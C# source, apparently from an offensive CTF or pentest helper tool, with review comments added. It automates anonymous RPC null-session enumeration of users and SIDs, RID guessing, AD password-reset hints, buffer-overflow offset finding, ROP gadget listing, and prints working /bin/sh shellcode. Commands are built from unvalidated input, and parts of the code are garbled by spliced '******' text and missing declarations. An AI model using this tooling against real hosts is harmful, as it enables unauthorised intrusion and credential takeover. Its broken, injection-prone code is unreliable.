        /// <summary>
        /// Collects MS-RPC information from <paramref name="ip"/> by running the Samba
        /// <c>rpcclient</c> tool (Linux only) with an empty username and password
        /// (<c>-U ""%""</c>, i.e. a null session) and formats what comes back as a
        /// multi-line text report.
        /// </summary>
        /// <param name="ip">Target host. It is interpolated verbatim into the rpcclient argument string.</param>
        /// <returns>Report text, one finding per line (with a trailing newline). Never null.</returns>
        private static string GetRPCInfo(string ip)
        {
            string rpcInfo    = "";
            // Set whenever a null-session query returned data. For a defender this is the
            // finding to act on: the host answers RPC queries without credentials.
            bool   anonAccess = false;

            if (General.GetOS() == General.OS.Linux)
            {
                if (General.IsInstalledOnLinux("rpcclient", "/usr/bin/rpcclient"))
                {
                    // NOTE(review): `ip` is neither validated nor quoted before being placed in the
                    // argument string (here and in every GetProcessOutput call below). If it can
                    // come from untrusted input, validate it as an IP address / hostname first
                    // (e.g. IPAddress.TryParse or a strict hostname check) to rule out argument injection.

                    // Find the Domain Name
                    // lsaquery prints several lines; keep only the "Domain Name:" one(s).
                    List <string> domainNameList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaquery\"");
                    domainNameList.RemoveAll(x => !x.StartsWith("Domain Name:"));
                    // Only recorded when exactly one such line remains.
                    if (domainNameList.Count == 1)
                    {
                        anonAccess = true;
                        rpcInfo   += "- " + domainNameList[0] + Environment.NewLine;
                    }

                    // Find basic users
                    List <string> enumdomusersList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"enumdomusers\"");
                    // No output from enumdomusers: fall back to lower-privilege queries.
                    if (enumdomusersList.Count == 0)
                    {
                        List <string> srvinfoList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"srvinfo\"");
                        if (srvinfoList.Count != 0)
                        {
                            anonAccess = true;
                            // Only the first srvinfo line is reported.
                            rpcInfo   += "- srvinfo: " + srvinfoList[0] + Environment.NewLine;
                        }

                        // Find public SIDs with lsaenumsid
                        List <string> sidList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaenumsid\"");
                        if (sidList.Count != 0)
                        {
                            anonAccess = true;
                            rpcInfo   += "- Found SIDs" + Environment.NewLine;
                            // Remove the "found X SIDs" text
                            sidList.RemoveAll(x => x.StartsWith("found "));

                            // Remove blanks
                            sidList.RemoveAll(x => string.IsNullOrEmpty(x));

                            // All remaining SIDs go into a single lookupsids invocation, space-separated.
                            string sidListString = string.Join(' ', sidList);

                            // Enumerate the rest
                            List <string> sidResolution = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids {sidListString}\"");
                            if (sidResolution.Count != 0)
                            {
                                foreach (string result in sidResolution)
                                {
                                    rpcInfo += "-- " + result + Environment.NewLine;
                                }
                            }
                        }

                        // Find sneaky SIDs
                        // NOTE(review): this copy of the source is corrupted from the next line onward
                        // (a scrubbing artefact replaced part of the text with "******"). The rest of the
                        // filter and the loop that declares and fills sneakySIDBaseList are missing; the
                        // closing braces that follow belong to that missing loop. Restore from the original
                        // source before compiling.
                        List <string> sneakyNameLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupnames administrator guest krbtgt root bin none");
                        sneakyNameLookup.RemoveAll(x => !x.Contains("(User: "******"-") + 1);
                                    if (!sneakySIDBaseList.Contains(sneakySIDBase))
                                    {
                                        sneakySIDBaseList.Add(sneakySIDBase);
                                    }
                                }
                            }

                            if (sneakySIDBaseList.Count != 0)
                            {
                                List <string> sneakySIDList = new List <string>();
                                foreach (string sneakyBase in sneakySIDBaseList)
                                {
                                    // Low ones are just system names - Can ignore them - Proper ones start from 1000
                                    // Note: sneakySIDList is declared outside this loop, so with several bases the
                                    // list (and the lookupsids argument) keeps growing across iterations.
                                    sneakySIDList.Add(sneakyBase + "1000");
                                    sneakySIDList.Add(sneakyBase + "1001");
                                    sneakySIDList.Add(sneakyBase + "1002");
                                    sneakySIDList.Add(sneakyBase + "1003");
                                    sneakySIDList.Add(sneakyBase + "1004");
                                    sneakySIDList.Add(sneakyBase + "1005");
                                    sneakySIDList.Add(sneakyBase + "1006");
                                    sneakySIDList.Add(sneakyBase + "1007");
                                    sneakySIDList.Add(sneakyBase + "1008");
                                    sneakySIDList.Add(sneakyBase + "1009");
                                    sneakySIDList.Add(sneakyBase + "1010");
                                    List <string> sneakySIDLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids " + string.Join(" ", sneakySIDList) + "\"");
                                    if (sneakySIDLookup.Count != 0)
                                    {
                                        foreach (string lookupResult in sneakySIDLookup)
                                        {
                                            // NOTE(review): if " (1)" is absent from a line, IndexOf returns -1 and
                                            // Substring(0, -1) throws ArgumentOutOfRangeException. Guard with a
                                            // `< 0` check (or `continue`) before slicing.
                                            string name = lookupResult.Substring(0, lookupResult.IndexOf(" (1)"));

                                            // Keep only the part after the last backslash (strip the domain prefix).
                                            name = name.Remove(0, name.LastIndexOf("\\") + 1);

                                            // Invalid ones simply have the number itself instead of the name
                                            // A bit hacky, but it works
                                            if (!int.TryParse(name, out int toIgnore))
                                            {
                                                rpcInfo += "-- Sneaky Name Found: " + name + Environment.NewLine;
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                    else // Count > 0
                    {
                        // The first enumdomusers line decides whether this is real output or an error message.
                        string firstItem = enumdomusersList[0];
                        // NOTE(review): this condition is corrupted in this copy ("******" is a scrubbing
                        // artefact); presumably it tests for both "user:" and "rid:" - verify against the original.
                        if (firstItem.Contains("user:"******"rid:"))
                        {
                            // All is fine
                            if (enumdomusersList.Count >= 3)
                            {
                                Console.WriteLine("Found a lot of useful RPC info - Output may take a few seconds longer than expected");
                            }
                            // NOTE(review): assignment (not +=) discards anything appended above, including the
                            // "Domain Name:" line. Use += if that line is meant to survive in this branch.
                            rpcInfo = "- User Listing" + Environment.NewLine;
                            foreach (string user in enumdomusersList)
                            {
                                // Per-user detail comes from the sibling QueryEnumDomUser helper.
                                rpcInfo += QueryEnumDomUser(ip, user);
                            }
                            // 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
                            rpcInfo += "--> rpcclient -> setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
                        }
                        // The following branches match rpcclient's connection error strings exactly
                        // (note the double space after "server."); any change in rpcclient's wording
                        // falls through to the "Unknown items" case.
                        else if (firstItem == "Cannot connect to server.  Error was NT_STATUS_RESOURCE_NAME_NOT_FOUND")
                        {
                            rpcInfo = "- Cannot connect - Are you sure it's up?" + Environment.NewLine;
                        }
                        else if (firstItem == "Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT")
                        {
                            rpcInfo = "- Cannot connect - It timed out :<" + Environment.NewLine;
                        }
                        else if (firstItem == "Cannot connect to server.  Error was NT_STATUS_CONNECTION_DISCONNECTED")
                        {
                            rpcInfo = "- Cannot connect - It kicks you out instantly" + Environment.NewLine;
                        }
                        else
                        {
                            // Unrecognised output: dump every line to the console for bug reports.
                            foreach (string item in enumdomusersList)
                            {
                                Console.WriteLine("Debug Info item: " + item);
                            }
                            rpcInfo = "- Unknown items in NETBIOS.GetRPCInfo - Bug Reelix (Check Debug Info Item output)" + Environment.NewLine;
                        }
                    }
                    // Summarise the null-session result. Pastel(...) presumably colours the console text
                    // (third-party extension) - it does not change the string content otherwise.
                    if (anonAccess == true)
                    {
                        rpcInfo += "- " + $"Anonymous access permitted! -> rpcclient -U \"\"%\"\" {ip}".Pastel(Color.Orange) + Environment.NewLine;
                    }
                    else
                    {
                        rpcInfo += "- No anonymous RPC access" + Environment.NewLine;
                        // 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
                        rpcInfo += "-- If you get access -> enumdomusers / queryuser usernameHere / setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
                    }
                }
                else
                {
                    rpcInfo = "- Error: Cannot find /usr/bin/rpcclient - Please install smbclient (Includes it)".Pastel(Color.Red) + Environment.NewLine;
                }
            }
            else
            {
                // rpcclient is only probed for on Linux; other OSes get a fixed message.
                rpcInfo = "- No RPC Info - Try run on Linux (rpcclient)" + Environment.NewLine;
            }
            return(rpcInfo);
        }
        /// <summary>
        /// Runs a set of Linux binary-analysis tools (<c>pwn</c>, <c>dmesg</c>, <c>ropper</c>,
        /// <c>rabin2</c>, <c>objdump</c>) against the ELF at <paramref name="fileName"/> and
        /// prints whatever each one reports to the console. Each tool is optional: a missing
        /// tool is announced and its step skipped.
        /// </summary>
        /// <param name="fileName">Path to the binary; must start with "./" or the method prints a message and returns.</param>
        private static void ScanFile(string fileName)
        {
            // Every later step assumes a relative "./" path (e.g. the bash pipe and the dmesg match).
            if (!fileName.StartsWith("./"))
            {
                Console.WriteLine("fileName must start with ./");
                return;
            }

            // Sibling helper: classifies the ELF header (x86 / x64 / other).
            Architecture architecture = IDElf(fileName);

            if (architecture == Architecture.x86)
            {
                Console.WriteLine("Architecture: x86");
                // You can get a segfault address of x86 programs by going
                // dmesg | tail -2 (Sometimes the last entry isn't for it)
                // dmesg | grep "ret2win32" | tail -1

                // pwn cyclic 500
                // aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
                if (General.IsInstalledOnLinux("pwn"))
                {
                    // NOTE(review): fileName is spliced unquoted into a `bash -c` command line, so a name
                    // containing shell metacharacters would be interpreted by the shell. The "./" check
                    // above does not prevent that - restrict the name to a safe character set
                    // (e.g. letters, digits, '.', '_', '-', '/') before this point. The trailing 5 is
                    // presumably a timeout for RunProcess - confirm against General.RunProcess.
                    General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
                    // Relies on the kernel's segfault message being visible through dmesg; where
                    // unprivileged dmesg access is restricted this list is empty and nothing is printed.
                    List <string> dmesgOutput = General.GetProcessOutput("dmesg", "");
                    foreach (string item in dmesgOutput)
                    {
                        //  segfault at 6161616c ip 000000006161616c x
                        // Match on the bare file name (leading "./" stripped) plus the segfault marker.
                        if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
                        {
                            // Console.WriteLine("-- Item: " + item);
                            // "segfault at " is 12 chars; the next 9 chars (trimmed) are taken as the hex address.
                            // NOTE(review): Substring(0, 9) throws if fewer than 9 chars follow the marker.
                            string segfaultHex = item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9).Trim();
                            // Console.WriteLine("-- segfaultHex: " + segfaultHex);
                            // HEX2ASCII is a sibling helper; the result is reversed (presumably to undo
                            // little-endian byte order) before being handed to pwn cyclic.
                            string pwntoolsSearch = (new string(HEX2ASCII(segfaultHex).Reverse().ToArray()));
                            // Console.WriteLine("-- pwntoolsSearch: " + segfaultHex);
                            // NOTE(review): First() throws InvalidOperationException when pwn prints nothing;
                            // FirstOrDefault() with a null check would keep the loop running.
                            string pwnPos = General.GetProcessOutput("pwn", "cyclic -l " + pwntoolsSearch).First();
                            Console.WriteLine("- Cyclic Segfault Overflow Position: " + pwnPos);
                        }
                    }
                }
                else
                {
                    Console.WriteLine("- pwntools is not installed - Skipping auto segfault");
                }
            }
            else if (architecture == Architecture.x64)
            {
                Console.WriteLine("Architecture: x64");
                // TODO: Find where it segfaults, -1
            }
            else
            {
                Console.WriteLine("Architecture: Unknown - Can only deal with ELFs");
            }

            // ropper: gadget and string search. Lines starting with [INFO] / [LOAD] are ropper's own
            // progress output and are filtered out in each loop below.
            if (General.IsInstalledOnLinux("ropper"))
            {
                List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        string pwnItem = item.Trim();
                        pwnItem = pwnItem.Replace(": ret;", "");
                        // 18 chars = "0x" + 16 hex digits, i.e. a 64-bit address; the last 6 hex digits are echoed.
                        if (pwnItem.Length == 18) // x64
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 18 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
                    }
                }

                // Same shape as above for the "pop rdi; ret;" search.
                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        // (stray second ';' is an empty statement - harmless)
                        string pwnItem = item.Trim();;
                        pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
                        if (pwnItem.Length == 18)
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 18 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
                    }
                }
                // String search; only lines that actually contain "/bin/sh" are considered.
                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
                    {
                        string pwnItem = item.Trim();
                        pwnItem = pwnItem.Replace("/bin/sh", "").Trim();;
                        // Here the expected width is 10 chars ("0x" + 8 hex digits), unlike the 18 above -
                        // presumably ropper prints string addresses in a shorter form; verify.
                        if (pwnItem.Length == 10)
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 10 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- /bin/sh --> " + pwnItem);
                    }
                }
                // // ropper --file sudo_pwn_file_here --string "/bin/sh"
            }
            else
            {
                Console.WriteLine("- ropper is not installed - Skipping gadget check and string search");
            }
            // rabin2 -I: binary info; only the "nx" line is inspected.
            if (General.IsInstalledOnLinux("rabin2"))
            {
                // Note: fileName already starts with "./" (enforced above), so this yields "././name".
                // It resolves to the same file on Linux, but the extra prefix is redundant.
                List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
                foreach (string item in rabin2Output)
                {
                    if (item.Trim().StartsWith("nx") && item.Contains("false"))
                    {
                        Console.WriteLine("- nx is disabled - You can run your own shellcode!");
                        if (architecture == Architecture.x64)
                        {
                            // Hard-coded example string for the x64 case (printed verbatim).
                            Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
                        }
                        else
                        {
                            // http://shell-storm.org/shellcode/
                            Console.WriteLine("Bug Reelix to fix his code!");
                        }
                    }
                    else if (item.Trim().StartsWith("nx") && item.Contains("true"))
                    {
                        Console.WriteLine("- nx is enabled - No custom shellcode for you!");
                    }
                }
            }
            else
            {
                Console.WriteLine("- rabin2 is not installed - Skipping nx check");
            }
            // objdump -D: full disassembly, scanned line by line for a few markers.
            if (General.IsInstalledOnLinux("objdump"))
            {
                List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
                foreach (string item in objdumpOutput)
                {
                    if (item.Contains("call") && item.Contains("system")) // callq contains call
                    {
                        Console.WriteLine("- system --> " + item);
                    }
                    if (item.Trim().EndsWith(" <puts@plt>:"))
                    {
                        Console.WriteLine("- puts@plt (plt_puts) --> " + item);
                    }
                    if (item.Contains("puts@GLIBC"))
                    {
                        Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
                    }
                }

                // objdump -t: symbol table; report global symbols in .text.
                objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
                foreach (string item in objdumpOutput)
                {
                    // .text = Name
                    // " g" = Global
                    if (item.Contains(".text") && item.Contains(" g "))
                    {
                        Console.WriteLine("- Useful Symbol: " + item);
                    }
                }
                // objdump -t ./file.elf | grep .text
            }
            else
            {
                Console.WriteLine("- objdump is not installed - Skipping syscalls");
            }
            Console.WriteLine("Finished");
        }